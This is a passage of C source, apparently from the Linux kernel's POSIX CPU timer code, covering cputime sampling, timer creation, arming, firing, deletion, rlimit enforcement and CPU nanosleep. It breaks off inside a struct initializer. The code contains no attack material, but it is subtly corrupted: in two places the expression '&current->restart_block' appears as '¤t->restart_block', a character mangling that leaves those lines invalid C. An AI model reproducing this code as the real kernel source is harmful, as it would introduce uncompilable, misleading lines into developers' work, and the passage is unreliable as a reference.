static inline void __update_gt_cputime(atomic64_t *cputime, u64 sum_cputime)
{
u64 curr_cputime;
retry:
curr_cputime = atomic64_read(cputime);
if (sum_cputime > curr_cputime) {
if (atomic64_cmpxchg(cputime, curr_cputime, sum_cputime) != curr_cputime)
goto retry;
}
}
static void update_gt_cputime(struct task_cputime_atomic *cputime_atomic, struct task_cputime *sum)
{
__update_gt_cputime(&cputime_atomic->utime, sum->utime);
__update_gt_cputime(&cputime_atomic->stime, sum->stime);
__update_gt_cputime(&cputime_atomic->sum_exec_runtime, sum->sum_exec_runtime);
}
/* Sample task_cputime_atomic values in "atomic_timers", store results in "times". */
static inline void sample_cputime_atomic(struct task_cputime *times,
struct task_cputime_atomic *atomic_times)
{
times->utime = atomic64_read(&atomic_times->utime);
times->stime = atomic64_read(&atomic_times->stime);
times->sum_exec_runtime = atomic64_read(&atomic_times->sum_exec_runtime);
}
void thread_group_cputimer(struct task_struct *tsk, struct task_cputime *times)
{
struct thread_group_cputimer *cputimer = &tsk->signal->cputimer;
struct task_cputime sum;
/* Check if cputimer isn't running. This is accessed without locking. */
if (!READ_ONCE(cputimer->running)) {
/*
* The POSIX timer interface allows for absolute time expiry
* values through the TIMER_ABSTIME flag, therefore we have
* to synchronize the timer to the clock every time we start it.
*/
thread_group_cputime(tsk, &sum);
update_gt_cputime(&cputimer->cputime_atomic, &sum);
/*
* We're setting cputimer->running without a lock. Ensure
* this only gets written to in one operation. We set
* running after update_gt_cputime() as a small optimization,
* but barriers are not required because update_gt_cputime()
* can handle concurrent updates.
*/
WRITE_ONCE(cputimer->running, true);
}
sample_cputime_atomic(times, &cputimer->cputime_atomic);
}
/*
* Sample a process (thread group) clock for the given group_leader task.
* Must be called with task sighand lock held for safe while_each_thread()
* traversal.
*/
static int cpu_clock_sample_group(const clockid_t which_clock,
struct task_struct *p,
u64 *sample)
{
struct task_cputime cputime;
switch (CPUCLOCK_WHICH(which_clock)) {
default:
return -EINVAL;
case CPUCLOCK_PROF:
thread_group_cputime(p, &cputime);
*sample = cputime.utime + cputime.stime;
break;
case CPUCLOCK_VIRT:
thread_group_cputime(p, &cputime);
*sample = cputime.utime;
break;
case CPUCLOCK_SCHED:
thread_group_cputime(p, &cputime);
*sample = cputime.sum_exec_runtime;
break;
}
return 0;
}
static int posix_cpu_clock_get_task(struct task_struct *tsk,
const clockid_t which_clock,
struct timespec64 *tp)
{
int err = -EINVAL;
u64 rtn;
if (CPUCLOCK_PERTHREAD(which_clock)) {
if (same_thread_group(tsk, current))
err = cpu_clock_sample(which_clock, tsk, &rtn);
} else {
if (tsk == current || thread_group_leader(tsk))
err = cpu_clock_sample_group(which_clock, tsk, &rtn);
}
if (!err)
*tp = ns_to_timespec64(rtn);
return err;
}
static int posix_cpu_clock_get(const clockid_t which_clock, struct timespec64 *tp)
{
const pid_t pid = CPUCLOCK_PID(which_clock);
int err = -EINVAL;
if (pid == 0) {
/*
* Special case constant value for our own clocks.
* We don't have to do any lookup to find ourselves.
*/
err = posix_cpu_clock_get_task(current, which_clock, tp);
} else {
/*
* Find the given PID, and validate that the caller
* should be able to see it.
*/
struct task_struct *p;
rcu_read_lock();
p = find_task_by_vpid(pid);
if (p)
err = posix_cpu_clock_get_task(p, which_clock, tp);
rcu_read_unlock();
}
return err;
}
/*
* Validate the clockid_t for a new CPU-clock timer, and initialize the timer.
* This is called from sys_timer_create() and do_cpu_nanosleep() with the
* new timer already all-zeros initialized.
*/
static int posix_cpu_timer_create(struct k_itimer *new_timer)
{
int ret = 0;
const pid_t pid = CPUCLOCK_PID(new_timer->it_clock);
struct task_struct *p;
if (CPUCLOCK_WHICH(new_timer->it_clock) >= CPUCLOCK_MAX)
return -EINVAL;
new_timer->kclock = &clock_posix_cpu;
INIT_LIST_HEAD(&new_timer->it.cpu.entry);
rcu_read_lock();
if (CPUCLOCK_PERTHREAD(new_timer->it_clock)) {
if (pid == 0) {
p = current;
} else {
p = find_task_by_vpid(pid);
if (p && !same_thread_group(p, current))
p = NULL;
}
} else {
if (pid == 0) {
p = current->group_leader;
} else {
p = find_task_by_vpid(pid);
if (p && !has_group_leader_pid(p))
p = NULL;
}
}
new_timer->it.cpu.task = p;
if (p) {
get_task_struct(p);
} else {
ret = -EINVAL;
}
rcu_read_unlock();
return ret;
}
/*
* Clean up a CPU-clock timer that is about to be destroyed.
* This is called from timer deletion with the timer already locked.
* If we return TIMER_RETRY, it's necessary to release the timer's lock
* and try again. (This happens when the timer is in the middle of firing.)
*/
static int posix_cpu_timer_del(struct k_itimer *timer)
{
int ret = 0;
unsigned long flags;
struct sighand_struct *sighand;
struct task_struct *p = timer->it.cpu.task;
WARN_ON_ONCE(p == NULL);
/*
* Protect against sighand release/switch in exit/exec and process/
* thread timer list entry concurrent read/writes.
*/
sighand = lock_task_sighand(p, &flags);
if (unlikely(sighand == NULL)) {
/*
* We raced with the reaping of the task.
* The deletion should have cleared us off the list.
*/
WARN_ON_ONCE(!list_empty(&timer->it.cpu.entry));
} else {
if (timer->it.cpu.firing)
ret = TIMER_RETRY;
else
list_del(&timer->it.cpu.entry);
unlock_task_sighand(p, &flags);
}
if (!ret)
put_task_struct(p);
return ret;
}
static void cleanup_timers_list(struct list_head *head)
{
struct cpu_timer_list *timer, *next;
list_for_each_entry_safe(timer, next, head, entry)
list_del_init(&timer->entry);
}
/*
* Clean out CPU timers still ticking when a thread exited. The task
* pointer is cleared, and the expiry time is replaced with the residual
* time for later timer_gettime calls to return.
* This must be called with the siglock held.
*/
static void cleanup_timers(struct list_head *head)
{
cleanup_timers_list(head);
cleanup_timers_list(++head);
cleanup_timers_list(++head);
}
/*
* These are both called with the siglock held, when the current thread
* is being reaped. When the final (leader) thread in the group is reaped,
* posix_cpu_timers_exit_group will be called after posix_cpu_timers_exit.
*/
void posix_cpu_timers_exit(struct task_struct *tsk)
{
cleanup_timers(tsk->cpu_timers);
}
void posix_cpu_timers_exit_group(struct task_struct *tsk)
{
cleanup_timers(tsk->signal->cpu_timers);
}
static inline int expires_gt(u64 expires, u64 new_exp)
{
return expires == 0 || expires > new_exp;
}
/*
* Insert the timer on the appropriate list before any timers that
* expire later. This must be called with the sighand lock held.
*/
static void arm_timer(struct k_itimer *timer)
{
struct task_struct *p = timer->it.cpu.task;
struct list_head *head, *listpos;
struct task_cputime *cputime_expires;
struct cpu_timer_list *const nt = &timer->it.cpu;
struct cpu_timer_list *next;
if (CPUCLOCK_PERTHREAD(timer->it_clock)) {
head = p->cpu_timers;
cputime_expires = &p->cputime_expires;
} else {
head = p->signal->cpu_timers;
cputime_expires = &p->signal->cputime_expires;
}
head += CPUCLOCK_WHICH(timer->it_clock);
listpos = head;
list_for_each_entry(next, head, entry) {
if (nt->expires < next->expires)
break;
listpos = &next->entry;
}
list_add(&nt->entry, listpos);
if (listpos == head) {
u64 exp = nt->expires;
/*
* We are the new earliest-expiring POSIX 1.b timer, hence
* need to update expiration cache. Take into account that
* for process timers we share expiration cache with itimers
* and RLIMIT_CPU and for thread timers with RLIMIT_RTTIME.
*/
switch (CPUCLOCK_WHICH(timer->it_clock)) {
case CPUCLOCK_PROF:
if (expires_gt(cputime_expires->prof_exp, exp))
cputime_expires->prof_exp = exp;
break;
case CPUCLOCK_VIRT:
if (expires_gt(cputime_expires->virt_exp, exp))
cputime_expires->virt_exp = exp;
break;
case CPUCLOCK_SCHED:
if (expires_gt(cputime_expires->sched_exp, exp))
cputime_expires->sched_exp = exp;
break;
}
if (CPUCLOCK_PERTHREAD(timer->it_clock))
tick_dep_set_task(p, TICK_DEP_BIT_POSIX_TIMER);
else
tick_dep_set_signal(p->signal, TICK_DEP_BIT_POSIX_TIMER);
}
}
/*
* The timer is locked, fire it and arrange for its reload.
*/
static void cpu_timer_fire(struct k_itimer *timer)
{
if ((timer->it_sigev_notify & ~SIGEV_THREAD_ID) == SIGEV_NONE) {
/*
* User don't want any signal.
*/
timer->it.cpu.expires = 0;
} else if (unlikely(timer->sigq == NULL)) {
/*
* This a special case for clock_nanosleep,
* not a normal timer from sys_timer_create.
*/
wake_up_process(timer->it_process);
timer->it.cpu.expires = 0;
} else if (timer->it.cpu.incr == 0) {
/*
* One-shot timer. Clear it as soon as it's fired.
*/
posix_timer_event(timer, 0);
timer->it.cpu.expires = 0;
} else if (posix_timer_event(timer, ++timer->it_requeue_pending)) {
/*
* The signal did not get queued because the signal
* was ignored, so we won't get any callback to
* reload the timer. But we need to keep it
* ticking in case the signal is deliverable next time.
*/
posix_cpu_timer_rearm(timer);
++timer->it_requeue_pending;
}
}
/*
* Sample a process (thread group) timer for the given group_leader task.
* Must be called with task sighand lock held for safe while_each_thread()
* traversal.
*/
static int cpu_timer_sample_group(const clockid_t which_clock,
struct task_struct *p, u64 *sample)
{
struct task_cputime cputime;
thread_group_cputimer(p, &cputime);
switch (CPUCLOCK_WHICH(which_clock)) {
default:
return -EINVAL;
case CPUCLOCK_PROF:
*sample = cputime.utime + cputime.stime;
break;
case CPUCLOCK_VIRT:
*sample = cputime.utime;
break;
case CPUCLOCK_SCHED:
*sample = cputime.sum_exec_runtime;
break;
}
return 0;
}
/*
* Guts of sys_timer_settime for CPU timers.
* This is called with the timer locked and interrupts disabled.
* If we return TIMER_RETRY, it's necessary to release the timer's lock
* and try again. (This happens when the timer is in the middle of firing.)
*/
static int posix_cpu_timer_set(struct k_itimer *timer, int timer_flags,
struct itimerspec64 *new, struct itimerspec64 *old)
{
unsigned long flags;
struct sighand_struct *sighand;
struct task_struct *p = timer->it.cpu.task;
u64 old_expires, new_expires, old_incr, val;
int ret;
WARN_ON_ONCE(p == NULL);
/*
* Use the to_ktime conversion because that clamps the maximum
* value to KTIME_MAX and avoid multiplication overflows.
*/
new_expires = ktime_to_ns(timespec64_to_ktime(new->it_value));
/*
* Protect against sighand release/switch in exit/exec and p->cpu_timers
* and p->signal->cpu_timers read/write in arm_timer()
*/
sighand = lock_task_sighand(p, &flags);
/*
* If p has just been reaped, we can no
* longer get any information about it at all.
*/
if (unlikely(sighand == NULL)) {
return -ESRCH;
}
/*
* Disarm any old timer after extracting its expiry time.
*/
lockdep_assert_irqs_disabled();
ret = 0;
old_incr = timer->it.cpu.incr;
old_expires = timer->it.cpu.expires;
if (unlikely(timer->it.cpu.firing)) {
timer->it.cpu.firing = -1;
ret = TIMER_RETRY;
} else
list_del_init(&timer->it.cpu.entry);
/*
* We need to sample the current value to convert the new
* value from to relative and absolute, and to convert the
* old value from absolute to relative. To set a process
* timer, we need a sample to balance the thread expiry
* times (in arm_timer). With an absolute time, we must
* check if it's already passed. In short, we need a sample.
*/
if (CPUCLOCK_PERTHREAD(timer->it_clock)) {
cpu_clock_sample(timer->it_clock, p, &val);
} else {
cpu_timer_sample_group(timer->it_clock, p, &val);
}
if (old) {
if (old_expires == 0) {
old->it_value.tv_sec = 0;
old->it_value.tv_nsec = 0;
} else {
/*
* Update the timer in case it has
* overrun already. If it has,
* we'll report it as having overrun
* and with the next reloaded timer
* already ticking, though we are
* swallowing that pending
* notification here to install the
* new setting.
*/
bump_cpu_timer(timer, val);
if (val < timer->it.cpu.expires) {
old_expires = timer->it.cpu.expires - val;
old->it_value = ns_to_timespec64(old_expires);
} else {
old->it_value.tv_nsec = 1;
old->it_value.tv_sec = 0;
}
}
}
if (unlikely(ret)) {
/*
* We are colliding with the timer actually firing.
* Punt after filling in the timer's old value, and
* disable this firing since we are already reporting
* it as an overrun (thanks to bump_cpu_timer above).
*/
unlock_task_sighand(p, &flags);
goto out;
}
if (new_expires != 0 && !(timer_flags & TIMER_ABSTIME)) {
new_expires += val;
}
/*
* Install the new expiry time (or zero).
* For a timer with no notification action, we don't actually
* arm the timer (we'll just fake it for timer_gettime).
*/
timer->it.cpu.expires = new_expires;
if (new_expires != 0 && val < new_expires) {
arm_timer(timer);
}
unlock_task_sighand(p, &flags);
/*
* Install the new reload setting, and
* set up the signal and overrun bookkeeping.
*/
timer->it.cpu.incr = timespec64_to_ns(&new->it_interval);
/*
* This acts as a modification timestamp for the timer,
* so any automatic reload attempt will punt on seeing
* that we have reset the timer manually.
*/
timer->it_requeue_pending = (timer->it_requeue_pending + 2) &
~REQUEUE_PENDING;
timer->it_overrun_last = 0;
timer->it_overrun = -1;
if (new_expires != 0 && !(val < new_expires)) {
/*
* The designated time already passed, so we notify
* immediately, even if the thread never runs to
* accumulate more time on this clock.
*/
cpu_timer_fire(timer);
}
ret = 0;
out:
if (old)
old->it_interval = ns_to_timespec64(old_incr);
return ret;
}
static void posix_cpu_timer_get(struct k_itimer *timer, struct itimerspec64 *itp)
{
u64 now;
struct task_struct *p = timer->it.cpu.task;
WARN_ON_ONCE(p == NULL);
/*
* Easy part: convert the reload time.
*/
itp->it_interval = ns_to_timespec64(timer->it.cpu.incr);
if (!timer->it.cpu.expires)
return;
/*
* Sample the clock to take the difference with the expiry time.
*/
if (CPUCLOCK_PERTHREAD(timer->it_clock)) {
cpu_clock_sample(timer->it_clock, p, &now);
} else {
struct sighand_struct *sighand;
unsigned long flags;
/*
* Protect against sighand release/switch in exit/exec and
* also make timer sampling safe if it ends up calling
* thread_group_cputime().
*/
sighand = lock_task_sighand(p, &flags);
if (unlikely(sighand == NULL)) {
/*
* The process has been reaped.
* We can't even collect a sample any more.
* Call the timer disarmed, nothing else to do.
*/
timer->it.cpu.expires = 0;
return;
} else {
cpu_timer_sample_group(timer->it_clock, p, &now);
unlock_task_sighand(p, &flags);
}
}
if (now < timer->it.cpu.expires) {
itp->it_value = ns_to_timespec64(timer->it.cpu.expires - now);
} else {
/*
* The timer should have expired already, but the firing
* hasn't taken place yet. Say it's just about to expire.
*/
itp->it_value.tv_nsec = 1;
itp->it_value.tv_sec = 0;
}
}
static unsigned long long
check_timers_list(struct list_head *timers,
struct list_head *firing,
unsigned long long curr)
{
int maxfire = 20;
while (!list_empty(timers)) {
struct cpu_timer_list *t;
t = list_first_entry(timers, struct cpu_timer_list, entry);
if (!--maxfire || curr < t->expires)
return t->expires;
t->firing = 1;
list_move_tail(&t->entry, firing);
}
return 0;
}
static inline void check_dl_overrun(struct task_struct *tsk)
{
if (tsk->dl.dl_overrun) {
tsk->dl.dl_overrun = 0;
__group_send_sig_info(SIGXCPU, SEND_SIG_PRIV, tsk);
}
}
/*
* Check for any per-thread CPU timers that have fired and move them off
* the tsk->cpu_timers[N] list onto the firing list. Here we update the
* tsk->it_*_expires values to reflect the remaining thread CPU timers.
*/
static void check_thread_timers(struct task_struct *tsk,
struct list_head *firing)
{
struct list_head *timers = tsk->cpu_timers;
struct task_cputime *tsk_expires = &tsk->cputime_expires;
u64 expires;
unsigned long soft;
if (dl_task(tsk))
check_dl_overrun(tsk);
/*
* If cputime_expires is zero, then there are no active
* per thread CPU timers.
*/
if (task_cputime_zero(&tsk->cputime_expires))
return;
expires = check_timers_list(timers, firing, prof_ticks(tsk));
tsk_expires->prof_exp = expires;
expires = check_timers_list(++timers, firing, virt_ticks(tsk));
tsk_expires->virt_exp = expires;
tsk_expires->sched_exp = check_timers_list(++timers, firing,
tsk->se.sum_exec_runtime);
/*
* Check for the special case thread timers.
*/
soft = task_rlimit(tsk, RLIMIT_RTTIME);
if (soft != RLIM_INFINITY) {
unsigned long hard = task_rlimit_max(tsk, RLIMIT_RTTIME);
if (hard != RLIM_INFINITY &&
tsk->rt.timeout > DIV_ROUND_UP(hard, USEC_PER_SEC/HZ)) {
/*
* At the hard limit, we just die.
* No need to calculate anything else now.
*/
if (print_fatal_signals) {
pr_info("CPU Watchdog Timeout (hard): %s[%d]\n",
tsk->comm, task_pid_nr(tsk));
}
__group_send_sig_info(SIGKILL, SEND_SIG_PRIV, tsk);
return;
}
if (tsk->rt.timeout > DIV_ROUND_UP(soft, USEC_PER_SEC/HZ)) {
/*
* At the soft limit, send a SIGXCPU every second.
*/
if (soft < hard) {
soft += USEC_PER_SEC;
tsk->signal->rlim[RLIMIT_RTTIME].rlim_cur =
soft;
}
if (print_fatal_signals) {
pr_info("RT Watchdog Timeout (soft): %s[%d]\n",
tsk->comm, task_pid_nr(tsk));
}
__group_send_sig_info(SIGXCPU, SEND_SIG_PRIV, tsk);
}
}
if (task_cputime_zero(tsk_expires))
tick_dep_clear_task(tsk, TICK_DEP_BIT_POSIX_TIMER);
}
static inline void stop_process_timers(struct signal_struct *sig)
{
struct thread_group_cputimer *cputimer = &sig->cputimer;
/* Turn off cputimer->running. This is done without locking. */
WRITE_ONCE(cputimer->running, false);
tick_dep_clear_signal(sig, TICK_DEP_BIT_POSIX_TIMER);
}
static void check_cpu_itimer(struct task_struct *tsk, struct cpu_itimer *it,
u64 *expires, u64 cur_time, int signo)
{
if (!it->expires)
return;
if (cur_time >= it->expires) {
if (it->incr)
it->expires += it->incr;
else
it->expires = 0;
trace_itimer_expire(signo == SIGPROF ?
ITIMER_PROF : ITIMER_VIRTUAL,
tsk->signal->leader_pid, cur_time);
__group_send_sig_info(signo, SEND_SIG_PRIV, tsk);
}
if (it->expires && (!*expires || it->expires < *expires))
*expires = it->expires;
}
/*
* Check for any per-thread CPU timers that have fired and move them
* off the tsk->*_timers list onto the firing list. Per-thread timers
* have already been taken off.
*/
static void check_process_timers(struct task_struct *tsk,
struct list_head *firing)
{
struct signal_struct *const sig = tsk->signal;
u64 utime, ptime, virt_expires, prof_expires;
u64 sum_sched_runtime, sched_expires;
struct list_head *timers = sig->cpu_timers;
struct task_cputime cputime;
unsigned long soft;
if (dl_task(tsk))
check_dl_overrun(tsk);
/*
* If cputimer is not running, then there are no active
* process wide timers (POSIX 1.b, itimers, RLIMIT_CPU).
*/
if (!READ_ONCE(tsk->signal->cputimer.running))
return;
/*
* Signify that a thread is checking for process timers.
* Write access to this field is protected by the sighand lock.
*/
sig->cputimer.checking_timer = true;
/*
* Collect the current process totals.
*/
thread_group_cputimer(tsk, &cputime);
utime = cputime.utime;
ptime = utime + cputime.stime;
sum_sched_runtime = cputime.sum_exec_runtime;
prof_expires = check_timers_list(timers, firing, ptime);
virt_expires = check_timers_list(++timers, firing, utime);
sched_expires = check_timers_list(++timers, firing, sum_sched_runtime);
/*
* Check for the special case process timers.
*/
check_cpu_itimer(tsk, &sig->it[CPUCLOCK_PROF], &prof_expires, ptime,
SIGPROF);
check_cpu_itimer(tsk, &sig->it[CPUCLOCK_VIRT], &virt_expires, utime,
SIGVTALRM);
soft = task_rlimit(tsk, RLIMIT_CPU);
if (soft != RLIM_INFINITY) {
unsigned long psecs = div_u64(ptime, NSEC_PER_SEC);
unsigned long hard = task_rlimit_max(tsk, RLIMIT_CPU);
u64 x;
if (psecs >= hard) {
/*
* At the hard limit, we just die.
* No need to calculate anything else now.
*/
if (print_fatal_signals) {
pr_info("RT Watchdog Timeout (hard): %s[%d]\n",
tsk->comm, task_pid_nr(tsk));
}
__group_send_sig_info(SIGKILL, SEND_SIG_PRIV, tsk);
return;
}
if (psecs >= soft) {
/*
* At the soft limit, send a SIGXCPU every second.
*/
if (print_fatal_signals) {
pr_info("CPU Watchdog Timeout (soft): %s[%d]\n",
tsk->comm, task_pid_nr(tsk));
}
__group_send_sig_info(SIGXCPU, SEND_SIG_PRIV, tsk);
if (soft < hard) {
soft++;
sig->rlim[RLIMIT_CPU].rlim_cur = soft;
}
}
x = soft * NSEC_PER_SEC;
if (!prof_expires || x < prof_expires)
prof_expires = x;
}
sig->cputime_expires.prof_exp = prof_expires;
sig->cputime_expires.virt_exp = virt_expires;
sig->cputime_expires.sched_exp = sched_expires;
if (task_cputime_zero(&sig->cputime_expires))
stop_process_timers(sig);
sig->cputimer.checking_timer = false;
}
/*
* This is called from the signal code (via posixtimer_rearm)
* when the last timer signal was delivered and we have to reload the timer.
*/
static void posix_cpu_timer_rearm(struct k_itimer *timer)
{
struct sighand_struct *sighand;
unsigned long flags;
struct task_struct *p = timer->it.cpu.task;
u64 now;
WARN_ON_ONCE(p == NULL);
/*
* Fetch the current sample and update the timer's expiry time.
*/
if (CPUCLOCK_PERTHREAD(timer->it_clock)) {
cpu_clock_sample(timer->it_clock, p, &now);
bump_cpu_timer(timer, now);
if (unlikely(p->exit_state))
return;
/* Protect timer list r/w in arm_timer() */
sighand = lock_task_sighand(p, &flags);
if (!sighand)
return;
} else {
/*
* Protect arm_timer() and timer sampling in case of call to
* thread_group_cputime().
*/
sighand = lock_task_sighand(p, &flags);
if (unlikely(sighand == NULL)) {
/*
* The process has been reaped.
* We can't even collect a sample any more.
*/
timer->it.cpu.expires = 0;
return;
} else if (unlikely(p->exit_state) && thread_group_empty(p)) {
/* If the process is dying, no need to rearm */
goto unlock;
}
cpu_timer_sample_group(timer->it_clock, p, &now);
bump_cpu_timer(timer, now);
/* Leave the sighand locked for the call below. */
}
/*
* Now re-arm for the new expiry time.
*/
lockdep_assert_irqs_disabled();
arm_timer(timer);
unlock:
unlock_task_sighand(p, &flags);
}
/**
* task_cputime_expired - Compare two task_cputime entities.
*
* @sample: The task_cputime structure to be checked for expiration.
* @expires: Expiration times, against which @sample will be checked.
*
* Checks @sample against @expires to see if any field of @sample has expired.
* Returns true if any field of the former is greater than the corresponding
* field of the latter if the latter field is set. Otherwise returns false.
*/
static inline int task_cputime_expired(const struct task_cputime *sample,
const struct task_cputime *expires)
{
if (expires->utime && sample->utime >= expires->utime)
return 1;
if (expires->stime && sample->utime + sample->stime >= expires->stime)
return 1;
if (expires->sum_exec_runtime != 0 &&
sample->sum_exec_runtime >= expires->sum_exec_runtime)
return 1;
return 0;
}
/**
* fastpath_timer_check - POSIX CPU timers fast path.
*
* @tsk: The task (thread) being checked.
*
* Check the task and thread group timers. If both are zero (there are no
* timers set) return false. Otherwise snapshot the task and thread group
* timers and compare them with the corresponding expiration times. Return
* true if a timer has expired, else return false.
*/
static inline int fastpath_timer_check(struct task_struct *tsk)
{
struct signal_struct *sig;
if (!task_cputime_zero(&tsk->cputime_expires)) {
struct task_cputime task_sample;
task_cputime(tsk, &task_sample.utime, &task_sample.stime);
task_sample.sum_exec_runtime = tsk->se.sum_exec_runtime;
if (task_cputime_expired(&task_sample, &tsk->cputime_expires))
return 1;
}
sig = tsk->signal;
/*
* Check if thread group timers expired when the cputimer is
* running and no other thread in the group is already checking
* for thread group cputimers. These fields are read without the
* sighand lock. However, this is fine because this is meant to
* be a fastpath heuristic to determine whether we should try to
* acquire the sighand lock to check/handle timers.
*
* In the worst case scenario, if 'running' or 'checking_timer' gets
* set but the current thread doesn't see the change yet, we'll wait
* until the next thread in the group gets a scheduler interrupt to
* handle the timer. This isn't an issue in practice because these
* types of delays with signals actually getting sent are expected.
*/
if (READ_ONCE(sig->cputimer.running) &&
!READ_ONCE(sig->cputimer.checking_timer)) {
struct task_cputime group_sample;
sample_cputime_atomic(&group_sample, &sig->cputimer.cputime_atomic);
if (task_cputime_expired(&group_sample, &sig->cputime_expires))
return 1;
}
if (dl_task(tsk) && tsk->dl.dl_overrun)
return 1;
return 0;
}
/*
* This is called from the timer interrupt handler. The irq handler has
* already updated our counts. We need to check if any timers fire now.
* Interrupts are disabled.
*/
void run_posix_cpu_timers(struct task_struct *tsk)
{
LIST_HEAD(firing);
struct k_itimer *timer, *next;
unsigned long flags;
lockdep_assert_irqs_disabled();
/*
* The fast path checks that there are no expired thread or thread
* group timers. If that's so, just return.
*/
if (!fastpath_timer_check(tsk))
return;
if (!lock_task_sighand(tsk, &flags))
return;
/*
* Here we take off tsk->signal->cpu_timers[N] and
* tsk->cpu_timers[N] all the timers that are firing, and
* put them on the firing list.
*/
check_thread_timers(tsk, &firing);
check_process_timers(tsk, &firing);
/*
* We must release these locks before taking any timer's lock.
* There is a potential race with timer deletion here, as the
* siglock now protects our private firing list. We have set
* the firing flag in each timer, so that a deletion attempt
* that gets the timer lock before we do will give it up and
* spin until we've taken care of that timer below.
*/
unlock_task_sighand(tsk, &flags);
/*
* Now that all the timers on our list have the firing flag,
* no one will touch their list entries but us. We'll take
* each timer's lock before clearing its firing flag, so no
* timer call will interfere.
*/
list_for_each_entry_safe(timer, next, &firing, it.cpu.entry) {
int cpu_firing;
spin_lock(&timer->it_lock);
list_del_init(&timer->it.cpu.entry);
cpu_firing = timer->it.cpu.firing;
timer->it.cpu.firing = 0;
/*
* The firing flag is -1 if we collided with a reset
* of the timer, which already reported this
* almost-firing as an overrun. So don't generate an event.
*/
if (likely(cpu_firing >= 0))
cpu_timer_fire(timer);
spin_unlock(&timer->it_lock);
}
}
/*
* Set one of the process-wide special case CPU timers or RLIMIT_CPU.
* The tsk->sighand->siglock must be held by the caller.
*/
void set_process_cpu_timer(struct task_struct *tsk, unsigned int clock_idx,
u64 *newval, u64 *oldval)
{
u64 now;
int ret;
WARN_ON_ONCE(clock_idx == CPUCLOCK_SCHED);
ret = cpu_timer_sample_group(clock_idx, tsk, &now);
if (oldval && ret != -EINVAL) {
/*
* We are setting itimer. The *oldval is absolute and we update
* it to be relative, *newval argument is relative and we update
* it to be absolute.
*/
if (*oldval) {
if (*oldval <= now) {
/* Just about to fire. */
*oldval = TICK_NSEC;
} else {
*oldval -= now;
}
}
if (!*newval)
return;
*newval += now;
}
/*
* Update expiration cache if we are the earliest timer, or eventually
* RLIMIT_CPU limit is earlier than prof_exp cpu timer expire.
*/
switch (clock_idx) {
case CPUCLOCK_PROF:
if (expires_gt(tsk->signal->cputime_expires.prof_exp, *newval))
tsk->signal->cputime_expires.prof_exp = *newval;
break;
case CPUCLOCK_VIRT:
if (expires_gt(tsk->signal->cputime_expires.virt_exp, *newval))
tsk->signal->cputime_expires.virt_exp = *newval;
break;
}
tick_dep_set_signal(tsk->signal, TICK_DEP_BIT_POSIX_TIMER);
}
static int do_cpu_nanosleep(const clockid_t which_clock, int flags,
const struct timespec64 *rqtp)
{
struct itimerspec64 it;
struct k_itimer timer;
u64 expires;
int error;
/*
* Set up a temporary timer and then wait for it to go off.
*/
memset(&timer, 0, sizeof timer);
spin_lock_init(&timer.it_lock);
timer.it_clock = which_clock;
timer.it_overrun = -1;
error = posix_cpu_timer_create(&timer);
timer.it_process = current;
if (!error) {
static struct itimerspec64 zero_it;
struct restart_block *restart;
memset(&it, 0, sizeof(it));
it.it_value = *rqtp;
spin_lock_irq(&timer.it_lock);
error = posix_cpu_timer_set(&timer, flags, &it, NULL);
if (error) {
spin_unlock_irq(&timer.it_lock);
return error;
}
while (!signal_pending(current)) {
if (timer.it.cpu.expires == 0) {
/*
* Our timer fired and was reset, below
* deletion can not fail.
*/
posix_cpu_timer_del(&timer);
spin_unlock_irq(&timer.it_lock);
return 0;
}
/*
* Block until cpu_timer_fire (or a signal) wakes us.
*/
__set_current_state(TASK_INTERRUPTIBLE);
spin_unlock_irq(&timer.it_lock);
schedule();
spin_lock_irq(&timer.it_lock);
}
/*
* We were interrupted by a signal.
*/
expires = timer.it.cpu.expires;
error = posix_cpu_timer_set(&timer, 0, &zero_it, &it);
if (!error) {
/*
* Timer is now unarmed, deletion can not fail.
*/
posix_cpu_timer_del(&timer);
}
spin_unlock_irq(&timer.it_lock);
while (error == TIMER_RETRY) {
/*
* We need to handle case when timer was or is in the
* middle of firing. In other cases we already freed
* resources.
*/
spin_lock_irq(&timer.it_lock);
error = posix_cpu_timer_del(&timer);
spin_unlock_irq(&timer.it_lock);
}
if ((it.it_value.tv_sec | it.it_value.tv_nsec) == 0) {
/*
* It actually did fire already.
*/
return 0;
}
error = -ERESTART_RESTARTBLOCK;
/*
* Report back to the user the time still remaining.
*/
restart = ¤t->restart_block;
restart->nanosleep.expires = expires;
if (restart->nanosleep.type != TT_NONE)
error = nanosleep_copyout(restart, &it.it_value);
}
return error;
}
static long posix_cpu_nsleep_restart(struct restart_block *restart_block);
static int posix_cpu_nsleep(const clockid_t which_clock, int flags,
const struct timespec64 *rqtp)
{
struct restart_block *restart_block = ¤t->restart_block;
int error;
/*
* Diagnose required errors first.
*/
if (CPUCLOCK_PERTHREAD(which_clock) &&
(CPUCLOCK_PID(which_clock) == 0 ||
CPUCLOCK_PID(which_clock) == task_pid_vnr(current)))
return -EINVAL;
error = do_cpu_nanosleep(which_clock, flags, rqtp);
if (error == -ERESTART_RESTARTBLOCK) {
if (flags & TIMER_ABSTIME)
return -ERESTARTNOHAND;
restart_block->fn = posix_cpu_nsleep_restart;
restart_block->nanosleep.clockid = which_clock;
}
return error;
}
static long posix_cpu_nsleep_restart(struct restart_block *restart_block)
{
clockid_t which_clock = restart_block->nanosleep.clockid;
struct timespec64 t;
t = ns_to_timespec64(restart_block->nanosleep.expires);
return do_cpu_nanosleep(which_clock, TIMER_ABSTIME, &t);
}
#define PROCESS_CLOCK make_process_cpuclock(0, CPUCLOCK_SCHED)
#define THREAD_CLOCK make_thread_cpuclock(0, CPUCLOCK_SCHED)
static int process_cpu_clock_getres(const clockid_t which_clock,
struct timespec64 *tp)
{
return posix_cpu_clock_getres(PROCESS_CLOCK, tp);
}
static int process_cpu_clock_get(const clockid_t which_clock,
struct timespec64 *tp)
{
return posix_cpu_clock_get(PROCESS_CLOCK, tp);
}
static int process_cpu_timer_create(struct k_itimer *timer)
{
timer->it_clock = PROCESS_CLOCK;
return posix_cpu_timer_create(timer);
}
static int process_cpu_nsleep(const clockid_t which_clock, int flags,
const struct timespec64 *rqtp)
{
return posix_cpu_nsleep(PROCESS_CLOCK, flags, rqtp);
}
static int thread_cpu_clock_getres(const clockid_t which_clock,
struct timespec64 *tp)
{
return posix_cpu_clock_getres(THREAD_CLOCK, tp);
}
static int thread_cpu_clock_get(const clockid_t which_clock,
struct timespec64 *tp)
{
return posix_cpu_clock_get(THREAD_CLOCK, tp);
}
static int thread_cpu_timer_create(struct k_itimer *timer)
{
timer->it_clock = THREAD_CLOCK;
return posix_cpu_timer_create(timer);
}
const struct k_clock clock_posix_cpu = {
.clock_getres = posix_cpu_clock_getres,
